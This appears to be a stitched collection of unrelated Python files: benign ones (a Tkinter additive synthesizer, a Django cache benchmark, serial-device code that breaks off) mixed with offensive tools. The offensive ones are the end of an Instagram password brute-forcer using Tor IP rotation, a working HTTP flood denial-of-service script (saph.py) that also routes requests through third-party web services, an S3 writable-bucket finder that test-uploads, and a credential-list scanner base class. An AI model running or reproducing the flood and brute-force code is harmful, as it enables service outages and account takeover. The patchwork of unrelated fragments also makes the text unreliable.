print (' [-] Obtaining Proxy IP {}...{}'.format(self.g,self.n))
self.changeIp()
time.sleep(1.3)
self.display()
def main():
# assign arugments
args = argparse.ArgumentParser()
args.add_argument('username',help='Email or username')
args.add_argument('wordlist',help='wordlist')
args = args.parse_args()
# assign variables
engine = Instagram(args.username,args.wordlist)
# does tor exists?
if not os.path.exists('/usr/bin/tor'):
try:engine,installTor()
except KeyboardInterrupt:engine.kill('Exiting {}...{}'.format(self.g,self.n))
if not os.path.exists('/usr/sbin/tor'):
engine.kill('Please Install Tor'.format(engine.y,engine.r,engine.n))
# does the account exists?
if not engine.exists(engine.username):
engine.kill('The Account \'{}\' does not exists'.format(engine.username.title()))
# start attack
try:
engine.run()
finally:
if not engine.isFound:
engine.kill('Exiting {}...{}'.format(engine.g,engine.n))
if __name__ == '__main__':
if not 'kali' in platform():
exit('Kali Linux required')
if os.getuid():
exit('root access required')
else:
main()
|
composer.py | #!/usr/bin/env python
"""
composer.py
--
Christopher Kuech
cjkuech@gmail.com
--
Requires:
Python 2.7, PyAudio
Instructions:
python composer.py [number-of-controllers]
"""
from array import array
from math import sin, pi
from pyaudio import PyAudio
import sys
from threading import Thread, Lock
import Tkinter as tk
class App(tk.Frame):
def __init__(self, root, n):
# init view with scrollbar
tk.Frame.__init__(self, root)
self.canvas = tk.Canvas(root, borderwidth=0, background="#ffffff")
self.frame = tk.Frame(self.canvas, background="#ffffff")
self.vsb = tk.Scrollbar(root, orient="vertical", command=self.canvas.yview)
self.canvas.configure(yscrollcommand=self.vsb.set)
self.vsb.pack(side="right", fill="y")
self.canvas.pack(side="left", fill="both", expand=True)
self.canvas.create_window((4,4), window=self.frame, anchor="nw", tags="self.frame")
self.frame.bind("<Configure>", self.onconfigure)
self.canvas["width"] = 810
self.canvas["height"] = 130 * (n + 1)
# init controllers
self.controllers = [Controller(self, self.frame, i) for i in xrange(n)]
# make combined wave view
self.disp = DisplayView(self.frame)
self.disp.grid(row=n, column=0)
self.disp["bg"] = "#555"
self.sound = Sound()
self.update()
self.sound.play()
def update(self):
# create composite drawing
imgdata = []
for x in xrange(DisplayView.WIDTH):
y = sum(c.disp.imgdata[x] for c in self.controllers) / len(self.controllers)
imgdata.append(y)
self.disp.setimgdata(imgdata)
# create composite sound
wavdata = []
for t in xrange(int(Sound.FPS / Sound.F0)):
samp = sum(c.sound.wavdata[t] for c in self.controllers) / len(self.controllers)
wavdata.append(samp)
self.sound.setwavdata(wavdata)
def onconfigure(self, event):
"""Reset the scroll region to encompass the inner frame"""
self.canvas.configure(scrollregion=self.canvas.bbox("all"))
class Controller:
def __init__(self, parent, wrapper, i):
self.parent = parent
self.disp = DisplayView(wrapper)
self.disp.grid(row=i, column=0)
self.ctrl = ControlView(wrapper)
self.ctrl.grid(row=i, column=1)
self.sound = Sound()
self.f = tk.IntVar()
self.a = tk.DoubleVar()
self.p = tk.DoubleVar()
self.f.set(0)
self.a.set(1)
self.p.set(0)
self.ctrl.bind(self)
self.disp.plot(self.f.get() + 1, self.a.get(), self.p.get())
self.sound.update(self.f.get() + 1, self.a.get(), self.p.get())
def onupdate(self):
self.disp.plot(self.f.get() + 1, self.a.get(), self.p.get())
self.sound.update(self.f.get() + 1, self.a.get(), self.p.get())
self.parent.update()
class ControlView(tk.Frame):
def __init__(self, parent, **kwargs):
tk.Frame.__init__(self, parent, **kwargs)
kwargs0 = {
"activebackground": "#f99",
"fg": "#333",
"font": ("Helvetica-Neue Helvetica sans-serif", "18"),
"bd": 1, # 3D border width
"highlightthickness": 1, # focus thickness
"length": 100, # currently default already
"orient": tk.VERTICAL,
"sliderrelief": tk.FLAT,
"troughcolor": "#ddd",
}
self.fslide = tk.Scale(self, label="f", from_=0, to=8, resolution=1, **kwargs0)
self.aslide = tk.Scale(self, label="a", from_=0.0, to=1, resolution=0.1, **kwargs0)
self.pslide = tk.Scale(self, label="p", from_=0.0, to=2*pi, resolution=2*pi/24, **kwargs0)
self.fslide.grid(row=0, column=0)
self.aslide.grid(row=0, column=1)
self.pslide.grid(row=0, column=2)
def bind(self, ctrl):
for (w, v) in ((self.fslide, ctrl.f), (self.aslide, ctrl.a), (self.pslide, ctrl.p)):
w["variable"] = v
w["command"] = lambda _: ctrl.onupdate()
class DisplayView(tk.Canvas):
WIDTH = 600
HEIGHT = 120
def __init__(self, parent):
tk.Canvas.__init__(self, parent, width=DisplayView.WIDTH, height=DisplayView.HEIGHT, bg="#333")
self.imgdata = [0 for x in xrange(DisplayView.WIDTH)]
def clear(self):
self.img = tk.PhotoImage(width=DisplayView.WIDTH, height=DisplayView.HEIGHT)
def drawaxis(self):
for x in xrange(DisplayView.WIDTH):
self.img.put("#999", (x, DisplayView.HEIGHT // 2))
def show(self):
self.create_image((round(DisplayView.WIDTH / 2), round(DisplayView.HEIGHT / 2)), image=self.img)
def plot(self, f, a, p):
self.clear()
self.drawaxis()
(f, a, p) = (float(f) / DisplayView.WIDTH, a * DisplayView.HEIGHT / 2 * 0.95, p)
for x in xrange(DisplayView.WIDTH):
y = a * sin(2 * pi * x * f - p)
self.setpx(x, y)
self.show()
def setimgdata(self, data):
self.clear()
self.drawaxis()
for (x, y) in enumerate(data):
self.setpx(x, y)
self.show()
def setpx(self, x, y):
mid = round(DisplayView.HEIGHT / 2)
(i, j) = (min(max(mid - y + 2, 0), DisplayView.HEIGHT), min(max(x + 5, 0), DisplayView.WIDTH))
self.imgdata[x] = y
self.img.put("#F00", (int(j), int(i)))
class Sound:
# F0 = 16.35 # C0
F0 = 110.0 # A2
FPS = 44100
def __init__(self):
self.wavdata = array('h', [0 for i in xrange(int(Sound.FPS / Sound.F0))])
self.lock = Lock()
def play(self):
def worker():
p = PyAudio()
stream = p.open(format=p.get_format_from_width(2),
channels=1, rate=44100, output=True)
while True:
self.lock.acquire()
stream.write(self.wavdata.tostring())
self.lock.release()
t = Thread(target=worker)
t.setDaemon(True)
t.start()
def update(self, f, a, p):
f = Sound.F0 * 2**f / Sound.FPS
a = (2**15 - 1) * a
for t in xrange(int(Sound.FPS / Sound.F0)):
samp = a * sin(2 * pi * t * f - p)
self.wavdata[t] = Sound.truncate(samp)
def setwavdata(self, wavdata):
self.lock.acquire()
for (i, samp) in enumerate(wavdata):
self.wavdata[i] = Sound.truncate(samp)
self.lock.release()
@staticmethod
def truncate(samp):
return int(max(min(samp, 2**15 - 1), -2**15))
if __name__ == "__main__":
n = int(sys.argv[1] if len(sys.argv) == 2 else 3)
root = tk.Tk()
root.wm_title("Additive Synthesizer")
App(root, n).pack(side="top", fill="both", expand=True)
root.mainloop()
#eof
|
saph.py | import os
import sys
import threading
import socket
import time as t
import colorama
from colorama import init
from colorama import Fore
import datetime
from datetime import datetime
from queue import Queue
from optparse import OptionParser
import time,sys,socket,threading,logging,urllib.request,random
banner = """
,-.
( O_)
/ `-/
/-. /
/ )
/ /
_ /-. /
(_)*-._ / )
*-._ *-'**( )/
*-/*-._* `.
/ *-.'._
/\ /-._*-._
_,---...__ / ) _,-*/ *-(_)
___<__(|) _ **-/ / / /
' `----' **-. \/ / /
) ] / /
____..-' // / )
,-** __.,'/ / ___ /,
/ ,--**/ / / /,-** ***-. ,'/
[ ( / / / / ,.---,_ `._ _,-','
\ `-./ / / / / `-._ *** ,-'
`-._ / / / /_,' **--*
*/ / / /*
/ / / /
/ / / /
/ |,' /
: / /
[ / ,'
| / ,'
|/,-'
'
"""
print(banner)
def user_agent():
global uagent
uagent=[]
uagent.append("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14")
uagent.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0")
uagent.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1")
return(uagent)
def my_bots():
global bots
bots=[]
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
return(bots)
def bot_hammering(url):
try:
while True:
req = urllib.request.urlopen(urllib.request.Request(url,headers={'User-Agent': random.choice(uagent)}))
print("\033[94mbot is hammering...\033[0m")
time.sleep(.1)
except:
time.sleep(.1)
def down_it(item):
try:
while True:
packet = str("GET / HTTP/1.1\nHost: "+host+"\n\n User-Agent: "+random.choice(uagent)+"\n"+data).encode('utf-8')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
if s.sendto( packet, (host, int(port)) ):
s.shutdown(1)
print ("\033[0m \033[35m [PACKET SENT TO HOST] ==> \033[31m",host,'\033[35m [FLOODING PORT] ==> \033[31m', port)
else:
s.shutdown(1)
print("\033[31m shut<->down\033[0m")
time.sleep(.1)
except socket.error as e:
print("\033[31m NO CONNECTION TO HOST [!] SERVER PWNED \033[0m")
#print("\033[91m",e,"\033[0m")
time.sleep(.1)
def dos():
while True:
item = q.get()
down_it(item)
q.task_done()
def dos2():
while True:
item=w.get()
bot_hammering(random.choice(bots)+"http://"+host)
w.task_done()
def usage():
print ('''\n
\033[31m
usage : python3 saph.py -s [server IPA] -p [Servers Port] -t [Threads]
-h : help/usage
-s : server ip
-p : port default 80
-t : turbo default 135 \033[0m''')
sys.exit()
def get_parameters():
global host
global port
global thr
global item
optp = OptionParser(add_help_option=False,epilog="Hammers")
optp.add_option("-q","--quiet", help="set logging to ERROR",action="store_const", dest="loglevel",const=logging.ERROR, default=logging.INFO)
optp.add_option("-s","--server", dest="host",help="attack to server ip -s ip")
optp.add_option("-p","--port",type="int",dest="port",help="-p 80 default 80")
optp.add_option("-t","--turbo",type="int",dest="turbo",help="default 135 -t 135")
optp.add_option("-h","--help",dest="help",action='store_true',help="help you")
opts, args = optp.parse_args()
logging.basicConfig(level=opts.loglevel,format='%(levelname)-8s %(message)s')
if opts.help:
usage()
if opts.host is not None:
host = opts.host
else:
usage()
if opts.port is None:
port = 80
else:
port = opts.port
if opts.turbo is None:
thr = 135
else:
thr = opts.turbo
# reading headers
global data
headers = open("headers.txt", "r")
data = headers.read()
headers.close()
q = Queue()
w = Queue()
if __name__ == '__main__':
if len(sys.argv) < 2:
usage()
get_parameters()
print("\033[92m [DATA] [ATTACKING] ===>",host," [ON PORT] ==> ",str(port)," [WITH THREADS] ==> ",str(thr),"\033[0m")
print("\033[94m Initating Attack...\033[0m")
user_agent()
my_bots()
time.sleep(5)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
s.settimeout(1)
except socket.error as e:
print("\033[31m [!] CANT CREAT A CONNECTION BETWEEN HOST, CHECK AGAIN[!] \033[0m")
usage()
while True:
for i in range(int(thr)):
t = threading.Thread(target=dos)
t.daemon = True
t.start()
t2 = threading.Thread(target=dos2)
t2.daemon = True
t2.start()
start = time.time()
item = 0
while True:
if (item>1800):
item=0
time.sleep(.1)
item = item + 1
q.put(item)
w.put(item)
q.join()
w.join()
|
find_s3_writable_buckets.py |
#!/usr/bin/env python3
from lib.constants import *
from lib.logger import *
from lib.traceback import *
from lib.progressbar import *
from lib.get_subpages import Page, get_subpages, get_source_code, get_domain
from module.test_upload import *
from module.find_s3_writable_buckets_constants import *
import datetime
import time
import multiprocessing
import queue
import requests
import urllib3
import http
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
from bs4 import BeautifulSoup
import re
try:
from urllib import urlopen
except:
from urllib.request import urlopen
import threading
import time
sleep_between_checks = .1
def find_writable_buckets(urls, max_subpages=50): #main method
try:
logger.log.critical("Checking for write-enabled or non-existant S3 buckets")
vulns_found = [] #Store all vulns found
pool_size = multiprocessing.cpu_count() * 2
pool = multiprocessing.Pool(processes=pool_size)
active_processes = [] #Store the processes until they are done
for url in urls:
active_processes.append(pool.apply_async(check_for_writable_buckets, (url.strip(), max_subpages)))
#Give a progressbar as the active_processes come in
num_items = len(urls)
progress = ProgressBar(num_items=len(urls))
while progress.cur_item < num_items or active_processes:
for active_process in active_processes:
if active_process.ready():
if active_process._value:
vulns_found.extend(active_process._value)
active_processes.remove(active_process)
progress(num_completed=1)
progress(num_completed=0)
time.sleep(1)
#Everything's done!
progress.done()
pool.close()
pool.join()
logger.log.critical("Done checking for write-enabled or non-existant S3 buckets")
return vulns_found
except:
logger.log.critical("Exception %s" % (get_exception().replace("\n", " ")))
return []
def check_for_writable_buckets(url, max_subpages):
try:
# logger.log.warning("Checking %s" % (url))
start_time = time.time()
vulns_found = []
threads = []
#Create the first page and set it up to store other page's buckets
page = Page(url=url)
page.source_code = get_source_code(page=page, include_js=True)
page.buckets_dict = {}
page.js_links_found = []
#Get subpages
get_subpages(page=page, max_subpages=max_subpages)
#Run the base page
t = threading.Thread(target=run_website, args=(page, page,))
threads.append(t)
t.start()
for subpage in page.subpages:
t = threading.Thread(target=run_website, args=(page, subpage,))
threads.append(t)
t.start()
#Pause if at max length
while len(threads) >= max_subpages:
time.sleep(sleep_between_checks)
for thread in threads:
if not thread.isAlive():
threads.remove(thread)
#Wait for all threads to finish.
while threads:
#Remove finished thraeds
for thread in threads:
if not thread.isAlive():
threads.remove(thread)
time.sleep(sleep_between_checks)
#Compile buckets
buckets_with_website = []
for vuln_url, buckets in page.buckets_dict.items():
for bucket in buckets:
if not any(existing_bucket == bucket for vuln_url, existing_bucket in buckets_with_website):
buckets_with_website.append((vuln_url, bucket))
#Run buckets
if buckets_with_website:
logger.log.warning("Running potential buckets for %s: %s" % (url, buckets_with_website))
for bucket_with_website in buckets_with_website:
vuln = test_upload(url, bucket_with_website)
if vuln:
vulns_found.append(vuln)
#log the URL as searched
add_searched_site(url)
# logger.log.warning("Finished %s in %s sec" % (url, (int(time.time()) - start_time)))
return vulns_found
except:
logger.log.critical("Exception on %s: %s" % (url, get_exception().replace("\n", " ")))
return []
def add_searched_site(url):
with open("%s/searched_sites.txt" % (list_dir), "a") as f:
f.write(get_domain(url)+"\n")
def run_website(page, subpage):
try:
if subpage.source_code:
#Reformat the source code to make S3 link extraction easier
subpage.source_code = reformat_s3_links(subpage.source_code)
find_buckets(page, subpage.url, subpage.source_code)
#Get links from any javascript on the pages as well
new_js_links = get_js_links(page, subpage.url, subpage.source_code)
# if new_js_links:
# logger.log.warning("%s JS links found on %s" % (len(new_js_links), subpage.url))
for new_js_link in new_js_links:
p = Page(url=new_js_link)
source_code = get_source_code(p, include_js=True)
source_code = reformat_s3_links(source_code)
find_buckets(page, new_js_link, source_code)
except:
logger.log.critical("Exception on %s: %s" % (subpage.url, get_exception().replace("\n", " ")))
def find_buckets(page, url, source_code):
try:
#Be sure it's not an ELB or other amazonaws link
if "s3.amazonaws.com" not in source_code:
return
else:
# logger.log.critical("%s - amazonaws found...Checking for buckets in source code." % (url))
bucket_names = []
good_bucket_names = []
bad_bucket_names = []
#Pull out all possible buckets
bucket_names = extract_bucket_names(source_code)
for bucket_name in list(set(bucket_names)):
bucket_name = bucket_name.strip()
#See if it got too much data from an earlier "//" string
if "//" in bucket_name:
bucket_name = bucket_name.split("//")[len(bucket_name.split("//"))-1]
#Add the bucket if it looks valid, checking if it is in the source code (e.g. no replacing messed it up)
if bucket_name in source_code:
if not any(bad_bucket_name_content in bucket_name for bad_bucket_name_content in bad_bucket_name_contents):
if len(bucket_name) <= max_bucket_len and len(bucket_name) >= 3:
if bucket_name in junk_buckets:
bad_bucket_names.append(bucket_name)
elif "elasticbeanstalk-" in bucket_name:
bad_bucket_names.append(bucket_name)
elif "blacklist" in url:
bad_bucket_names.append(bucket_name)
else:
good_bucket_names.append(bucket_name)
#Return unique bucket names
good_bucket_names = list(set(good_bucket_names))
page.buckets_dict[url] = good_bucket_names
except:
logger.log.critical("Exception %s" % (get_exception().replace("\n", " ")))
def reformat_s3_links(source_code):
#Remove DNS prefetch...
source_code = source_code.replace("rel='dns-prefetch' href='//s3.amazonaws.com'", "")
source_code = source_code.replace("rel='dns-prefetch' href='s3.amazonaws.com'", "")
source_code = source_code.replace("rel='dns-prefetch' href='http://s3.amazonaws.com", "")
source_code = source_code.replace("rel='dns-prefetch' href='https://s3.amazonaws.com", "")
source_code = source_code.replace('rel="dns-prefetch" href="//s3.amazonaws.com"', '')
source_code = source_code.replace('rel="dns-prefetch" href="s3.amazonaws.com"', '')
source_code = source_code.replace('rel="dns-prefetch" href="http://s3.amazonaws.com', "")
source_code = source_code.replace('rel="dns-prefetch" href="https://s3.amazonaws.com', "")
#Remove region names so you don't have to worry about them in the regex
source_code = source_code.replace(":80", "")
source_code = source_code.replace(":8080", "")
source_code = source_code.replace(":8000", "")
source_code = source_code.replace(":443", "")
source_code = source_code.replace("-us-east-2", "")
source_code = source_code.replace("-us-east-1", "")
source_code = source_code.replace("-us-west-2", "")
source_code = source_code.replace("-us-west-1", "")
source_code = source_code.replace("-ap-south-1", "")
source_code = source_code.replace("-ap-northeast-1", "")
source_code = source_code.replace("-ap-northeast-2", "")
source_code = source_code.replace("-ap-northeast-3", "")
source_code = source_code.replace("-ap-southeast-1", "")
source_code = source_code.replace("-ap-southeast-2", "")
source_code = source_code.replace("-ca-central-1", "")
source_code = source_code.replace("-cn-north-1", "")
source_code = source_code.replace("-eu-central-1", "")
source_code = source_code.replace("-eu-west-1", "")
source_code = source_code.replace("-eu-west-2", "")
source_code = source_code.replace("-eu-west-3", "")
source_code = source_code.replace("-sa-east-1", "")
#Replace some of the html encoding
source_code = str(source_code.replace("\/","/").replace("') + '", "").replace('") + "', ''))
return source_code
def extract_bucket_names(source_code):
try:
bucket_names = []
search_string = "s3.amazonaws.com"
first_chars = [match.start() for match in re.finditer(re.escape(search_string), source_code)]
for first_char in first_chars:
start_index = (first_char-max_bucket_len) if (first_char-max_bucket_len) >=0 else 0
end_index = first_char+max_bucket_len
#Get subdomain strings
bucket_names_subdomain = re.findall(r'''[\/'" ]([a-zA-Z0-9\.\-\_]{3,63})\.s3\.amazonaws\.com''', source_code[start_index:first_char+len(search_string)])
#Be sure you've got the bucket name as the regex will take the first instance of the optional char
for bucket_name in bucket_names_subdomain:
# print(bucket_name)
bucket_name = bucket_name.strip()
for c in ("/", "'", '"', " "):
if str(c) in str(bucket_name):
bucket_name = bucket_name.split(c)[len(bucket_name.split(c))-1]
bucket_names.append(bucket_name)
#Get subfolder strings
bucket_names_subfolder = re.findall(r'''[^.]s3\.amazonaws\.com\/([a-zA-Z0-9\.\-\_]{3,63})[\/'" ]''', source_code[first_char-1:end_index])
#Be sure you've got the bucket name as the regex will take the last instance of the optional char
for bucket_name in bucket_names_subfolder:
# print(bucket_name)
bucket_name = bucket_name.strip()
for c in ("/", "'", '"', " "):
if c in bucket_name:
bucket_name.split(c)[0]
bucket_names.append(bucket_name)
return bucket_names
except:
logger.log.critical("Error extracting names: %s" % (get_exception().replace("\n", " ")))
def get_js_links(page, url, source_code):
# logger.log.warning("Checking for js on %s" % (url))
#Get all links
try:
bsObj = BeautifulSoup(source_code, "html.parser")
except:
logger.log.warning("Error parsing source code: %s" % (get_exception().replace("\n", " ")))
return []
new_js_links = []
try:
js_links = [i.get('src') for i in bsObj.find_all('script') if i.get('src')]
for js_link in js_links:
#See if it's an external lnk
if js_link[0] == "/" and js_link[1] == "/":
js_link = js_link[2::]
if js_link not in page.js_links_found:
page.js_links_found.append(js_link)
new_js_links.append(js_link)
#Strip it of http/https just to clean it up
else:
if "http" not in js_link:
#Just try it as is, e.g. if it's "somedomain.com/js/file.js" Just be sure it's not a /.....
if js_link not in page.js_links_found:
if js_link[0] != "/":
page.js_links_found.append(js_link)
new_js_links.append(js_link)
#Also try it with the current domain, e.g. if it's "js/file.js"
if page.domain not in js_link:
if js_link[0] == "/":
js_link = "%s%s" % (page.domain, js_link)
else:
js_link = "%s/%s" % (page.domain, js_link)
if js_link not in page.js_links_found:
page.js_links_found.append(js_link)
new_js_links.append(js_link)
#Just be sure it's in there in some way...
if js_link not in page.js_links_found:
page.js_links_found.append(js_link)
new_js_links.append(js_link)
return new_js_links
except:
logger.log.critical("Error parsing source code: %s" % (get_exception().replace("\n", " ")))
return new_js_links
def is_ok_error(e):
try:
for ok_error in ok_errors:
if str(ok_error) in str(e):
return True
return False
except:
logger.log.critical("Exception %s" % (get_exception().replace("\n", " ")))
|
benchmark_djangocache.py | """Benchmark diskcache.DjangoCache
$ export PYTHONPATH=/Users/grantj/repos/python-diskcache
$ python tests/benchmark_djangocache.py > tests/timings_djangocache.txt
"""
import collections as co
import multiprocessing as mp
import os
import pickle
import random
import shutil
import time
from utils import display
PROCS = 8
OPS = int(1e5)
RANGE = int(1.1e3)
WARMUP = int(1e3)
def setup():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'tests.settings_benchmark')
import django
django.setup()
def worker(num, name):
setup()
from django.core.cache import caches
obj = caches[name]
random.seed(num)
timings = co.defaultdict(list)
time.sleep(0.01) # Let other processes start.
for count in range(OPS):
key = str(random.randrange(RANGE)).encode('utf-8')
value = str(count).encode('utf-8') * random.randrange(1, 100)
choice = random.random()
if choice < 0.900:
start = time.time()
result = obj.get(key)
end = time.time()
miss = result is None
action = 'get'
elif choice < 0.990:
start = time.time()
result = obj.set(key, value)
end = time.time()
miss = result is False
action = 'set'
else:
start = time.time()
result = obj.delete(key)
end = time.time()
miss = result is False
action = 'delete'
if count > WARMUP:
delta = end - start
timings[action].append(delta)
if miss:
timings[action + '-miss'].append(delta)
with open('output-%d.pkl' % num, 'wb') as writer:
pickle.dump(timings, writer, protocol=pickle.HIGHEST_PROTOCOL)
def prepare(name):
setup()
from django.core.cache import caches
obj = caches[name]
for key in range(RANGE):
key = str(key).encode('utf-8')
obj.set(key, key)
try:
obj.close()
except Exception:
pass
def dispatch():
setup()
from django.core.cache import caches # noqa
for name in ['locmem', 'memcached', 'redis', 'diskcache', 'filebased']:
shutil.rmtree('tmp', ignore_errors=True)
preparer = mp.Process(target=prepare, args=(name,))
preparer.start()
preparer.join()
processes = [
mp.Process(target=worker, args=(value, name))
for value in range(PROCS)
]
for process in processes:
process.start()
for process in processes:
process.join()
timings = co.defaultdict(list)
for num in range(PROCS):
filename = 'output-%d.pkl' % num
with open(filename, 'rb') as reader:
output = pickle.load(reader)
for key in output:
timings[key].extend(output[key])
os.remove(filename)
display(name, timings)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument(
'-p',
'--processes',
type=int,
default=PROCS,
help='Number of processes to start',
)
parser.add_argument(
'-n',
'--operations',
type=float,
default=OPS,
help='Number of operations to perform',
)
parser.add_argument(
'-r',
'--range',
type=int,
default=RANGE,
help='Range of keys',
)
parser.add_argument(
'-w',
'--warmup',
type=float,
default=WARMUP,
help='Number of warmup operations before timings',
)
args = parser.parse_args()
PROCS = int(args.processes)
OPS = int(args.operations)
RANGE = int(args.range)
WARMUP = int(args.warmup)
dispatch()
|
VulnerableScanningEngine.py | # Base Class For Vulnerable Scanning Engine
import threading
from tqdm import tqdm
from Configuration.Configuration import APP_CONFIGURATION
class ScanningThreadPool:
def __init__(self, maxsize):
self.maxsize = maxsize
self.thread_dict = {}
self.container = 0
def thread_function(self, execute, name):
def function(*args):
execute(*args)
del self.thread_dict[name]
return function
def start_new_thread(self, function, args):
while True:
if len(self.thread_dict.keys()) < self.maxsize:
name = "Thread%s" % str(self.container)
self.container += 1
self.thread_dict[name] = threading.Thread(target=self.thread_function(function, name), args=(args))
self.thread_dict[name].start()
# self.thread_dict[name].join()
break
else:
continue
def show_size(self):
tqdm.write(self.maxsize)
def show_status(self):
for key in self.thread_dict.keys():
tqdm.write("Thread: " + self.thread_dict[key] + " : " + self.thread_dict[key].is_alive())
class VulnerableScannerBaseClass:
def __init__(self, target):
self.target = target # target = "target://ip:port:protocol"
if self.target.find(",") >= 0:
self.target = self.target.split(",")
for item in self.target:
if item == "":
self.target.remove(item)
if isinstance(self.target, str):
self.target = [self.target]
self.thread_pool = ScanningThreadPool(APP_CONFIGURATION["ThreadCount"])
self.username_list = [username.split("\n")[0] for username in
open(APP_CONFIGURATION["UsernameFile"], "r").readlines()]
self.password_list = [password.split("\n")[0] for password in
open(APP_CONFIGURATION["PasswordFile"], "r").readlines()]
self.size = len(self.target)
self.percent = tqdm
self.header = APP_CONFIGURATION["Header"]
def target_tuple(self):
_list = []
for target in self.target:
content = target.split("://")[1]
ipaddress, port, protocol = content.split(":")
_list.append((ipaddress, port, protocol))
self.size = len(_list)
return _list
def ScannerRegister(name, clazz):
APP_CONFIGURATION["VulnerableDictionary"][name] = clazz
|
send_cmd.py | """
Manage communications between the PC and the device.
Requirements:
* pyserial
* continuous_threading
"""
import sys
import time
import serial
import functools
import contextlib
import continuous_threading
from pybk8500.parser import Parser
__all__ = ['CommunicationManager', 'send_msg', 'main']
def pop_messages(msg_list, msg_type=None):
"""Iterate and remove messages with the message type."""
off = 0
for i in range(len(msg_list)):
msg = msg_list[i-off]
if msg_type is None or isinstance(msg, msg_type):
yield msg
msg_list.pop(i-off)
off += 1
class CommunicationManager(object):
Parser = Parser
read_rate = 1/30
read_size = 4096
def __init__(self, connection=None, parser=None, com=None, baudrate=None, **kwargs):
super().__init__()
if parser is None:
parser = self.Parser()
if connection is None:
connection = serial.Serial()
# connection.rts = True # Documentation states needed. Did not work
# connection.dtr = True # Documentation states needed. Did not work
self._parser = None
self._process = None
self._in_enter = False
self._enter_started = False
self._enter_connected = False
self.read_rate = self.__class__.read_rate
self.read_size = self.__class__.read_size
self.read_delay = 0.0001
self.wait_delay = 0.01
for k, v in kwargs.items():
setattr(self, k, v)
self.ack_lock = continuous_threading.RLock()
self.ack_list = []
self.response_types = []
self.connection = connection
if baudrate is not None:
self.set_baudrate(baudrate)
if com is not None:
self.set_com(com)
self.set_parser(parser)
def get_parser(self):
"""Return the parser."""
return self._parser
def set_parser(self, parser):
"""Set the parser.
Args:
parser (object/None/Parser)[None]: Parser object to parse incoming messages.
"""
self._parser = parser
if self._parser is not None:
self._parser.message_parsed = self.message_parsed
self._parser.error = self.error
parser = property(get_parser, set_parser)
def save_ack(self, msg):
"""Save the response messages in the available response_types."""
if len(self.response_types) == 0 or any(isinstance(msg, rtype) for rtype in self.response_types):
with self.ack_lock:
self.ack_list.append(msg)
message_parsed = save_ack
@contextlib.contextmanager
def change_message_parsed(self, callback):
"""Change the message parsed function while in this with block."""
old = self.message_parsed
self.message_parsed = callback
yield
self.message_parsed = old
@staticmethod
def error(error):
"""Callback to indicate that an error happened.
Args:
error (Exception): Optional error object if applicable (C parsers do not create error objects).
"""
print('{}: {}'.format(type(error).__name__, error), file=sys.stderr)
@contextlib.contextmanager
def change_connection(self):
"""Change the connection properties safely."""
is_connected = self.is_connected()
if is_connected:
self.disconnect()
yield
if is_connected:
self.connect()
def get_baudrate(self):
"""Return the baudrate."""
return self.connection.baudrate
def set_baudrate(self, value, *args, **kwargs):
"""Set the baudrate."""
with self.change_connection():
self.connection.baudrate = value
def get_com(self):
"""Return the serial com port."""
return self.connection.port
def set_com(self, value, *args, **kwargs):
"""Set the serial com port and try to connect."""
with self.change_connection():
self.connection.port = value
get_port = get_com
set_port = set_com
def get_rts(self):
"""Return if the RTS Hardware Flow Control is set."""
try:
return self.connection.rts
except (AttributeError, Exception):
return False
def set_rts(self, value, *args, **kwargs):
"""Set the RTS Hardware Flow Control."""
with self.change_connection():
self.connection.rts = bool(value)
def get_dtr(self):
"""Return if the DTR Hardware Flow Control is set."""
try:
return self.connection.dtr
except (AttributeError, Exception):
return False
def set_dtr(self, value, *args, **kwargs):
"""Set the DTR Hardware Flow Control."""
with self.change_connection():
self.connection.dtr = bool(value)
def is_connected(self):
"""Return if the connection/serial port is connected."""
try:
if isinstance(self.connection, serial.Serial):
return self.connection.is_open
except (AttributeError, Exception):
pass
return False
def connect(self, com=None, baudrate=None, **kwargs):
"""Connect the connection/serial port."""
if com is not None or baudrate is not None:
self.disconnect()
if com is not None:
self.connection.port = com
if baudrate is not None:
self.connection.baudrate = baudrate
if not self.is_connected():
self.flush()
if isinstance(self.connection, serial.Serial):
self.connection.timeout = self.read_rate
self.connection.open()
def disconnect(self, *args, **kwargs):
"""Disconnect the connection/serial port."""
if isinstance(self.connection, serial.Serial):
self.connection.close()
def flush(self):
"""Clear the message buffer and input buffer."""
with self.ack_lock:
self.ack_list.clear()
try:
self.connection.flush()
except (AttributeError, Exception):
pass
try:
self.connection.reset_input_buffer()
except (AttributeError, Exception):
pass
try:
self.connection.reset_output_buffer()
except (AttributeError, Exception):
pass
def read(self):
"""Read data from the connection."""
if isinstance(self.connection, serial.Serial):
read_size = self.read_size
if read_size is None or read_size <= 0:
read_size = self.connection.in_waiting
return self.connection.read(read_size)
else:
return b''
def write(self, byts):
"""Write the bytes (or message) data to the connection."""
return self.connection.write(bytes(byts))
def read_and_parse(self):
"""Read data from the connection and parse it."""
try:
if self.is_connected():
byts = self.read()
if byts:
self.parser.parse(byts, self.message_parsed)
time.sleep(self.read_delay)
else:
time.sleep(0.1)
except (ConnectionAbortedError, SystemError, TimeoutError, RuntimeError, Exception) as err:
self.error(err)
# print(str(err), file=sys.stderr)
@contextlib.contextmanager
def listen_for_messages(self, *msg_types):
